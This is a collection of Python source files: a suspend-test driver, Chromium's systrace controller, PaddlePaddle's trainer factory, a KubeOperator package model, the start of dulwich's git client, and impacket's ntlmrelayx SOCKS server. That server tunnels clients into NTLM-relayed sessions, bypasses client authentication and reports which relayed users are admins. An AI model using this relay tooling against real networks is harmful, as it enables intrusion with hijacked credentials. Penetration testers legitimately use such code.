if not statusCheck(True):
ret = 1
elif(cmd == 'fpdt'):
if not getFPDT(True):
ret = 1
elif(cmd == 'sysinfo'):
sysvals.printSystemInfo(True)
elif(cmd == 'devinfo'):
deviceInfo()
elif(cmd == 'modes'):
pprint(getModes())
elif(cmd == 'flist'):
sysvals.getFtraceFilterFunctions(True)
elif(cmd == 'flistall'):
sysvals.getFtraceFilterFunctions(False)
elif(cmd == 'summary'):
runSummary(sysvals.outdir, True, genhtml)
elif(cmd in ['xon', 'xoff', 'xstandby', 'xsuspend', 'xinit', 'xreset']):
sysvals.verbose = True
ret = sysvals.displayControl(cmd[1:])
elif(cmd == 'xstat'):
pprint('Display Status: %s' % sysvals.displayControl('stat').upper())
elif(cmd == 'wificheck'):
dev = sysvals.checkWifi()
if dev:
print('%s is connected' % sysvals.wifiDetails(dev))
else:
print('No wifi connection found')
elif(cmd == 'cmdinfo'):
for out in sysvals.cmdinfo(False, True):
print('[%s - %s]\n%s\n' % out)
sys.exit(ret)
# if instructed, re-analyze existing data files
if(sysvals.notestrun):
stamp = rerunTest(sysvals.outdir)
sysvals.outputResult(stamp)
sys.exit(0)
# verify that we can run a test
error = statusCheck()
if(error):
doError(error)
# extract mem/disk extra modes and convert
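	# e.g. "-m mem-s2idle" is run as the freeze mode and "-m mem-shallow" as standby,
	# while "-m disk-platform" keeps suspendmode "disk" and sets diskmode to "platform"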
mode = sysvals.suspendmode
if mode.startswith('mem'):
memmode = mode.split('-', 1)[-1] if '-' in mode else 'deep'
if memmode == 'shallow':
mode = 'standby'
elif memmode == 's2idle':
mode = 'freeze'
else:
mode = 'mem'
sysvals.memmode = memmode
sysvals.suspendmode = mode
if mode.startswith('disk-'):
sysvals.diskmode = mode.split('-', 1)[-1]
sysvals.suspendmode = 'disk'
sysvals.systemInfo(dmidecode(sysvals.mempath))
failcnt, ret = 0, 0
if sysvals.multitest['run']:
# run multiple tests in a separate subdirectory
if not sysvals.outdir:
if 'time' in sysvals.multitest:
s = '-%dm' % sysvals.multitest['time']
else:
s = '-x%d' % sysvals.multitest['count']
sysvals.outdir = datetime.now().strftime('suspend-%y%m%d-%H%M%S'+s)
if not os.path.isdir(sysvals.outdir):
os.makedirs(sysvals.outdir)
sysvals.sudoUserchown(sysvals.outdir)
finish = datetime.now()
if 'time' in sysvals.multitest:
finish += timedelta(minutes=sysvals.multitest['time'])
for i in range(sysvals.multitest['count']):
sysvals.multistat(True, i, finish)
if i != 0 and sysvals.multitest['delay'] > 0:
pprint('Waiting %d seconds...' % (sysvals.multitest['delay']))
time.sleep(sysvals.multitest['delay'])
fmt = 'suspend-%y%m%d-%H%M%S'
sysvals.testdir = os.path.join(sysvals.outdir, datetime.now().strftime(fmt))
ret = runTest(i+1, True)
failcnt = 0 if not ret else failcnt + 1
if sysvals.maxfail > 0 and failcnt >= sysvals.maxfail:
pprint('Maximum fail count of %d reached, aborting multitest' % (sysvals.maxfail))
break
time.sleep(5)
sysvals.resetlog()
sysvals.multistat(False, i, finish)
if 'time' in sysvals.multitest and datetime.now() >= finish:
break
if not sysvals.skiphtml:
runSummary(sysvals.outdir, False, False)
sysvals.sudoUserchown(sysvals.outdir)
else:
if sysvals.outdir:
sysvals.testdir = sysvals.outdir
# run the test in the current directory
ret = runTest()
# reset to default values after testing
if sysvals.display:
sysvals.displayControl('reset')
if sysvals.rs != 0:
sysvals.setRuntimeSuspend(False)
sys.exit(ret)
|
systrace_controller.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import threading
import zlib
from profile_chrome import controllers
from profile_chrome import util
from pylib import cmd_helper
_SYSTRACE_OPTIONS = [
# Compress the trace before sending it over USB.
'-z',
# Use a large trace buffer to increase the polling interval.
'-b', '16384'
]
# Interval in seconds for sampling systrace data.
_SYSTRACE_INTERVAL = 15
_TRACING_ON_PATH = '/sys/kernel/debug/tracing/tracing_on'
class SystraceController(controllers.BaseController):
def __init__(self, device, categories, ring_buffer):
controllers.BaseController.__init__(self)
self._device = device
self._categories = categories
self._ring_buffer = ring_buffer
self._done = threading.Event()
self._thread = None
self._trace_data = None
def __repr__(self):
return 'systrace'
@staticmethod
def GetCategories(device):
return device.RunShellCommand('atrace --list_categories')
def StartTracing(self, _):
self._thread = threading.Thread(target=self._CollectData)
self._thread.start()
def StopTracing(self):
self._done.set()
def PullTrace(self):
self._thread.join()
self._thread = None
if self._trace_data:
output_name = 'systrace-%s' % util.GetTraceTimestamp()
with open(output_name, 'w') as out:
out.write(self._trace_data)
return output_name
def IsTracingOn(self):
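    # Read the kernel's tracing_on flag on the device; '1' means a trace is
    # still being recorded.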
result = self._RunAdbShellCommand(['cat', _TRACING_ON_PATH])
return result.strip() == '1'
def _RunAdbShellCommand(self, command):
# We use a separate interface to adb because the one from AndroidCommands
# isn't re-entrant.
# TODO(jbudorick) Look at providing a way to unhandroll this once the
# adb rewrite has fully landed.
device_param = (['-s', str(self._device)] if str(self._device) else [])
cmd = ['adb'] + device_param + ['shell'] + command
return cmd_helper.GetCmdOutput(cmd)
def _RunATraceCommand(self, command):
cmd = ['atrace', '--%s' % command] + _SYSTRACE_OPTIONS + self._categories
return self._RunAdbShellCommand(cmd)
def _ForceStopAtrace(self):
# atrace on pre-M Android devices cannot be stopped asynchronously
# correctly. Use synchronous mode to force stop.
cmd = ['atrace', '-t', '0']
return self._RunAdbShellCommand(cmd)
def _CollectData(self):
trace_data = []
self._RunATraceCommand('async_start')
try:
while not self._done.is_set():
self._done.wait(_SYSTRACE_INTERVAL)
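        # In ring-buffer mode only the final dump (taken once tracing stops) is
        # kept; otherwise an async_dump is collected at every polling interval.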
if not self._ring_buffer or self._done.is_set():
trace_data.append(
self._DecodeTraceData(self._RunATraceCommand('async_dump')))
finally:
trace_data.append(
self._DecodeTraceData(self._RunATraceCommand('async_stop')))
if self.IsTracingOn():
self._ForceStopAtrace()
self._trace_data = ''.join([zlib.decompress(d) for d in trace_data])
@staticmethod
def _DecodeTraceData(trace_data):
try:
trace_start = trace_data.index('TRACE:')
except ValueError:
raise RuntimeError('Systrace start marker not found')
trace_data = trace_data[trace_start + 6:]
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
# Skip the initial newline.
return trace_data[1:]
|
socksserver.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SOCKS proxy server/client
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# A simple SOCKS server that proxy connection to relayed connections
#
# ToDo:
# [ ] Handle better the SOCKS specification (RFC1928), e.g. BIND
# [ ] Port handlers should be dynamically subscribed, and coded in another place. This will help coding
# proxies for different protocols (e.g. MSSQL)
import SocketServer
import socket
import time
import logging
from Queue import Queue
from struct import unpack, pack
from threading import Timer, Thread
from nebulousAD.modimpacket import LOG
from nebulousAD.modimpacket.dcerpc.v5.enum import Enum
from nebulousAD.modimpacket.structure import Structure
# Interval in seconds at which each socks plugin's keep alive function will be called.
# It is up to each plugin to decide whether to actually send a keep alive to the target on every hit.
# In some cases (e.g. SMB) it is not needed to send a keep alive every 30 secs.
KEEP_ALIVE_TIMER = 30.0
class enumItems(Enum):
NO_AUTHENTICATION = 0
GSSAPI = 1
USER_PASS = 2
UNACCEPTABLE = 0xFF
class replyField(Enum):
SUCCEEDED = 0
SOCKS_FAILURE = 1
NOT_ALLOWED = 2
NETWORK_UNREACHABLE = 3
HOST_UNREACHABLE = 4
CONNECTION_REFUSED = 5
TTL_EXPIRED = 6
COMMAND_NOT_SUPPORTED = 7
ADDRESS_NOT_SUPPORTED = 8
class ATYP(Enum):
IPv4 = 1
DOMAINNAME = 3
IPv6 = 4
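# The Structure subclasses below describe the SOCKS wire formats byte for byte:
# the SOCKS5 greeting/request/reply messages from RFC 1928 and the older
# SOCKS4/SOCKS4a request/reply messages.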
class SOCKS5_GREETINGS(Structure):
structure = (
('VER','B=5'),
#('NMETHODS','B=0'),
('METHODS','B*B'),
)
class SOCKS5_GREETINGS_BACK(Structure):
structure = (
('VER','B=5'),
('METHODS','B=0'),
)
class SOCKS5_REQUEST(Structure):
structure = (
('VER','B=5'),
('CMD','B=0'),
('RSV','B=0'),
('ATYP','B=0'),
('PAYLOAD',':'),
)
class SOCKS5_REPLY(Structure):
structure = (
('VER','B=5'),
('REP','B=5'),
('RSV','B=0'),
('ATYP','B=1'),
('PAYLOAD',':="AAAAA"'),
)
class SOCKS4_REQUEST(Structure):
structure = (
('VER','B=4'),
('CMD','B=0'),
('PORT','>H=0'),
('ADDR','4s="'),
('PAYLOAD',':'),
)
class SOCKS4_REPLY(Structure):
structure = (
('VER','B=0'),
('REP','B=0x5A'),
('RSV','<H=0'),
('RSV','<L=0'),
)
activeConnections = Queue()
# Taken from https://stackoverflow.com/questions/474528/what-is-the-best-way-to-repeatedly-execute-a-function-every-x-seconds-in-python
# Thanks https://stackoverflow.com/users/624066/mestrelion
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.next_call = time.time()
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self.next_call += self.interval
self._timer = Timer(self.next_call - time.time(), self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
# Base class for Relay Socks Servers for different protocols (SMB, MSSQL, etc)
# Besides using this base class you need to define one global variable when
# writing a plugin for socksplugins:
# PLUGIN_CLASS = "<name of the class for the plugin>"
class SocksRelay:
PLUGIN_NAME = 'Base Plugin'
# The plugin scheme, for automatic registration with relay servers
# Should be specified in full caps, e.g. LDAP, HTTPS
PLUGIN_SCHEME = ''
def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
self.targetHost = targetHost
self.targetPort = targetPort
self.socksSocket = socksSocket
self.sessionData = activeRelays['data']
self.username = None
self.clientConnection = None
self.activeRelays = activeRelays
def initConnection(self):
# Here we do whatever is necessary to leave the relay ready for processing incoming connections
raise RuntimeError('Virtual Function')
def skipAuthentication(self):
        # In charge of bypassing any authentication attempt from the client
raise RuntimeError('Virtual Function')
def tunnelConnection(self):
        # In charge of tunneling the rest of the connection
raise RuntimeError('Virtual Function')
@staticmethod
    def getProtocolPort():
# Should return the port this relay works against
raise RuntimeError('Virtual Function')
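# A minimal plugin sketch built on the base class above (illustrative only; the
# real plugins live in the socksplugins package and the names/port below are
# assumptions):
#
#   class MyProtoSocksRelay(SocksRelay):
#       PLUGIN_NAME = 'MYPROTO Socks Plugin'
#       PLUGIN_SCHEME = 'MYPROTO'
#       def initConnection(self): ...
#       def skipAuthentication(self): return True
#       def tunnelConnection(self): ...
#       @staticmethod
#       def getProtocolPort(): return 4444
#
#   PLUGIN_CLASS = 'MyProtoSocksRelay'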
def keepAliveTimer(server):
LOG.debug('KeepAlive Timer reached. Updating connections')
for target in server.activeRelays.keys():
for port in server.activeRelays[target].keys():
# Now cycle through the users
for user in server.activeRelays[target][port].keys():
if user != 'data' and user != 'scheme':
# Let's call the keepAlive method for the handler to keep the connection alive
if server.activeRelays[target][port][user]['inUse'] is False:
LOG.debug('Calling keepAlive() for %s@%s:%s' % (user, target, port))
try:
server.activeRelays[target][port][user]['protocolClient'].keepAlive()
except Exception, e:
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0 or str(e).find('Server not connected') >=0:
# Connection died, taking out of the active list
del (server.activeRelays[target][port][user])
if len(server.activeRelays[target][port].keys()) == 1:
del (server.activeRelays[target][port])
LOG.debug('Removing active relay for %s@%s:%s' % (user, target, port))
else:
LOG.debug('Skipping %s@%s:%s since it\'s being used at the moment' % (user, target, port))
def activeConnectionsWatcher(server):
while True:
# This call blocks until there is data, so it doesn't loop endlessly
target, port, scheme, userName, client, data = activeConnections.get()
# ToDo: Careful. Dicts are not thread safe right?
if server.activeRelays.has_key(target) is not True:
server.activeRelays[target] = {}
if server.activeRelays[target].has_key(port) is not True:
server.activeRelays[target][port] = {}
if server.activeRelays[target][port].has_key(userName) is not True:
LOG.info('SOCKS: Adding %s@%s(%s) to active SOCKS connection. Enjoy' % (userName, target, port))
server.activeRelays[target][port][userName] = {}
# This is the protocolClient. Needed because we need to access the killConnection from time to time.
# Inside this instance, you have the session attribute pointing to the relayed session.
server.activeRelays[target][port][userName]['protocolClient'] = client
server.activeRelays[target][port][userName]['inUse'] = False
server.activeRelays[target][port][userName]['data'] = data
        # Just for the CHALLENGE data, we also store it at the target/port level
server.activeRelays[target][port]['data'] = data
        # Let's store the protocol scheme, needed later to find the right socks relay server to use
server.activeRelays[target][port]['scheme'] = scheme
        # Default values in case somebody asks while we're getting the data
server.activeRelays[target][port][userName]['isAdmin'] = 'N/A'
# Do we have admin access in this connection?
try:
LOG.debug("Checking admin status for user %s" % str(userName))
isAdmin = client.isAdmin()
server.activeRelays[target][port][userName]['isAdmin'] = isAdmin
except Exception as e:
# Method not implemented
server.activeRelays[target][port][userName]['isAdmin'] = 'N/A'
pass
LOG.debug("isAdmin returned: %s" % server.activeRelays[target][port][userName]['isAdmin'])
else:
LOG.info('Relay connection for %s at %s(%d) already exists. Discarding' % (userName, target, port))
client.killConnection()
def webService(server):
from flask import Flask, jsonify
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def index():
print server.activeRelays
return "Relays available: %s!" % (len(server.activeRelays))
@app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
def get_relays():
relays = []
for target in server.activeRelays:
for port in server.activeRelays[target]:
for user in server.activeRelays[target][port]:
if user != 'data' and user != 'scheme':
protocol = server.activeRelays[target][port]['scheme']
isAdmin = server.activeRelays[target][port][user]['isAdmin']
relays.append([protocol, target, user, isAdmin, str(port)])
return jsonify(relays)
    @app.route('/ntlmrelayx/api/v1.0/relays/<relay>', methods=['GET'])
def get_info(relay):
pass
app.run(host='0.0.0.0', port=9090)
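# Example query against the REST API started above (illustrative):
#   curl http://127.0.0.1:9090/ntlmrelayx/api/v1.0/relays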
class SocksRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.__socksServer = server
self.__ip, self.__port = client_address
self.__connSocket= request
self.__socksVersion = 5
self.targetHost = None
self.targetPort = None
self.__NBSession= None
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
def sendReplyError(self, error = replyField.CONNECTION_REFUSED):
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = error.value
else:
reply = SOCKS4_REPLY()
if error.value != 0:
reply['REP'] = 0x5B
return self.__connSocket.sendall(reply.getData())
def handle(self):
LOG.debug("SOCKS: New Connection from %s(%s)" % (self.__ip, self.__port))
data = self.__connSocket.recv(8192)
        greetings = SOCKS5_GREETINGS_BACK(data)
        self.__socksVersion = greetings['VER']
if self.__socksVersion == 5:
# We need to answer back with a no authentication response. We're not dealing with auth for now
self.__connSocket.sendall(str(SOCKS5_GREETINGS_BACK()))
data = self.__connSocket.recv(8192)
request = SOCKS5_REQUEST(data)
else:
# We're in version 4, we just received the request
request = SOCKS4_REQUEST(data)
# Let's process the request to extract the target to connect.
# SOCKS5
if self.__socksVersion == 5:
if request['ATYP'] == ATYP.IPv4.value:
self.targetHost = socket.inet_ntoa(request['PAYLOAD'][:4])
self.targetPort = unpack('>H',request['PAYLOAD'][4:])[0]
elif request['ATYP'] == ATYP.DOMAINNAME.value:
hostLength = unpack('!B',request['PAYLOAD'][0])[0]
self.targetHost = request['PAYLOAD'][1:hostLength+1]
self.targetPort = unpack('>H',request['PAYLOAD'][hostLength+1:])[0]
else:
LOG.error('No support for IPv6 yet!')
# SOCKS4
else:
self.targetPort = request['PORT']
# SOCKS4a
if request['ADDR'][:3] == "\x00\x00\x00" and request['ADDR'][3] != "\x00":
                nullBytePos = request['PAYLOAD'].find("\x00")
if nullBytePos == -1:
LOG.error('Error while reading SOCKS4a header!')
else:
self.targetHost = request['PAYLOAD'].split('\0', 1)[1][:-1]
else:
self.targetHost = socket.inet_ntoa(request['ADDR'])
LOG.debug('SOCKS: Target is %s(%s)' % (self.targetHost, self.targetPort))
if self.targetPort != 53:
# Do we have an active connection for the target host/port asked?
# Still don't know the username, but it's a start
if self.__socksServer.activeRelays.has_key(self.targetHost):
if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort) is not True:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
else:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
# Now let's get into the loops
if self.targetPort == 53:
# Somebody wanting a DNS request. Should we handle this?
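            # Port 53 traffic is never relayed; it is forwarded directly to the
            # target so DNS resolution keeps working for the SOCKS client.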
s = socket.socket()
try:
LOG.debug('SOCKS: Connecting to %s(%s)' %(self.targetHost, self.targetPort))
s.connect((self.targetHost, self.targetPort))
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.error('SOCKS: %s' %str(e))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = s.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
while True:
try:
data = self.__connSocket.recv(8192)
if data == '':
break
s.sendall(data)
data = s.recv(8192)
self.__connSocket.sendall(data)
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
                    LOG.error('SOCKS: %s', str(e))
# Let's look if there's a relayed connection for our host/port
scheme = None
if self.__socksServer.activeRelays.has_key(self.targetHost):
if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort):
scheme = self.__socksServer.activeRelays[self.targetHost][self.targetPort]['scheme']
if scheme is not None:
LOG.debug('Handler for port %s found %s' % (self.targetPort, self.__socksServer.socksPlugins[scheme]))
relay = self.__socksServer.socksPlugins[scheme](self.targetHost, self.targetPort, self.__connSocket,
self.__socksServer.activeRelays[self.targetHost][self.targetPort])
try:
relay.initConnection()
# Let's answer back saying we've got the connection. Data is fake
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = self.__connSocket.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
if relay.skipAuthentication() is not True:
# Something didn't go right
# Close the socket
self.__connSocket.close()
return
# Ok, so we have a valid connection to play with. Let's lock it while we use it so the Timer doesn't send a
# keep alive to this one.
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = True
relay.tunnelConnection()
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0:
# Connection died, taking out of the active list
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username])
if len(self.__socksServer.activeRelays[self.targetHost][self.targetPort].keys()) == 1:
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort])
LOG.debug('Removing active relay for %s@%s:%s' % (relay.username, self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
pass
# Freeing up this connection
if relay.username is not None:
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = False
else:
LOG.error('SOCKS: I don\'t have a handler for this port')
LOG.debug('SOCKS: Shutting down connection')
try:
self.sendReplyError(replyField.CONNECTION_REFUSED)
except Exception, e:
LOG.debug('SOCKS END: %s' % str(e))
class SOCKS(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address=('0.0.0.0', 1080), handler_class=SocksRequestHandler):
LOG.info('SOCKS proxy started. Listening at port %d', server_address[1] )
self.activeRelays = {}
self.socksPlugins = {}
self.restAPI = None
self.activeConnectionsWatcher = None
self.supportedSchemes = []
SocketServer.TCPServer.allow_reuse_address = True
SocketServer.TCPServer.__init__(self, server_address, handler_class)
# Let's register the socksplugins plugins we have
from nebulousAD.modimpacket.examples.ntlmrelayx.servers.socksplugins import SOCKS_RELAYS
for relay in SOCKS_RELAYS:
LOG.info('%s loaded..' % relay.PLUGIN_NAME)
self.socksPlugins[relay.PLUGIN_SCHEME] = relay
self.supportedSchemes.append(relay.PLUGIN_SCHEME)
# Let's create a timer to keep the connections up.
self.__timer = RepeatedTimer(KEEP_ALIVE_TIMER, keepAliveTimer, self)
# Let's start our RESTful API
self.restAPI = Thread(target=webService, args=(self, ))
self.restAPI.daemon = True
self.restAPI.start()
# Let's start out worker for active connections
self.activeConnectionsWatcher = Thread(target=activeConnectionsWatcher, args=(self, ))
self.activeConnectionsWatcher.daemon = True
self.activeConnectionsWatcher.start()
def shutdown(self):
self.__timer.stop()
del self.restAPI
del self.activeConnectionsWatcher
return SocketServer.TCPServer.shutdown(self)
if __name__ == '__main__':
from nebulousAD.modimpacket.examples import logger
logger.init()
s = SOCKS()
s.serve_forever()
|
trainer_factory.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
local_logger = logging.getLogger(__name__)
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandler", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info["trainer"]
device_worker_class = opt_info["device_worker"]
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
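# Minimal usage sketch (illustrative; "trainer" and "device_worker" are the only
# required opt_info keys handled above, everything else is optional):
#   trainer = TrainerFactory()._create_trainer()   # MultiTrainer + Hogwild
#   trainer = TrainerFactory()._create_trainer(
#       {"trainer": "DistMultiTrainer", "device_worker": "DownpourSGD"})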
class FetchHandlerMonitor(object):
"""
    Definition of the FetchHandlerMonitor class;
    it periodically invokes a fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
            if not self.running:
                # release the lock before exiting so a later start() cannot deadlock
                self.running_lock.release()
                break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
                    if var is None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
                    if fetch_dict[key] is None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
|
package.py
|
import logging
import os
import threading
import uuid
import yaml
from django.db import models
from common.models import JsonTextField
from django.utils.translation import ugettext_lazy as _
from fit2ansible.settings import PACKAGE_DIR
from kubeops_api.package_manage import *
logger = logging.getLogger('kubeops')
__all__ = ['Package']
class Package(models.Model):
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
name = models.CharField(max_length=20, unique=True, verbose_name=_('Name'))
meta = JsonTextField(blank=True, null=True, verbose_name=_('Meta'))
date_created = models.DateTimeField(auto_now_add=True, verbose_name=_('Date created'))
packages_dir = PACKAGE_DIR
def __str__(self):
return self.name
class Meta:
verbose_name = _('Package')
@property
def path(self):
return os.path.join(self.packages_dir, self.name)
@property
def repo_port(self):
return self.meta['vars']['repo_port']
@property
def registry_port(self):
return self.meta['vars']['registry_port']
@classmethod
def lookup(cls):
logger.info('lookup package...')
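        # Expected layout: every package is a subdirectory of PACKAGE_DIR that
        # contains a meta.yml file; anything else is skipped.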
for d in os.listdir(cls.packages_dir):
full_path = os.path.join(cls.packages_dir, d)
meta_path = os.path.join(full_path, 'meta.yml')
if not os.path.isdir(full_path) or not os.path.isfile(meta_path):
continue
with open(meta_path) as f:
metadata = yaml.load(f)
defaults = {'name': d, 'meta': metadata}
logger.info('save package {}...'.format(d))
instance = cls.objects.update_or_create(defaults=defaults, name=d)[0]
            thread = threading.Thread(target=cls.start_container, args=(instance,))
thread.start()
@classmethod
def start_container(cls, package):
if not is_package_container_exists(package.name):
create_package_container(package)
return
if not is_package_container_start(package.name):
start_package_container(package)
|
client.py
|
# client.py -- Implementation of the server side git protocols
# Copyright (C) 2008-2013 Jelmer Vernooij <jelmer@samba.org>
# Copyright (C) 2008 John Carr
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# or (at your option) a later version of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Client side support for the Git protocol.
The Dulwich client supports the following capabilities:
* thin-pack
* multi_ack_detailed
* multi_ack
* side-band-64k
* ofs-delta
* report-status
* delete-refs
Known capabilities that are not supported:
* shallow
* no-progress
* include-tag
"""
__docformat__ = 'restructuredText'
from contextlib import closing
from io import BytesIO, BufferedReader
import dulwich
import select
import socket
import subprocess
import sys
try:
import urllib2
import urlparse
except ImportError:
import urllib.request as urllib2
import urllib.parse as urlparse
from dulwich.errors import (
GitProtocolError,
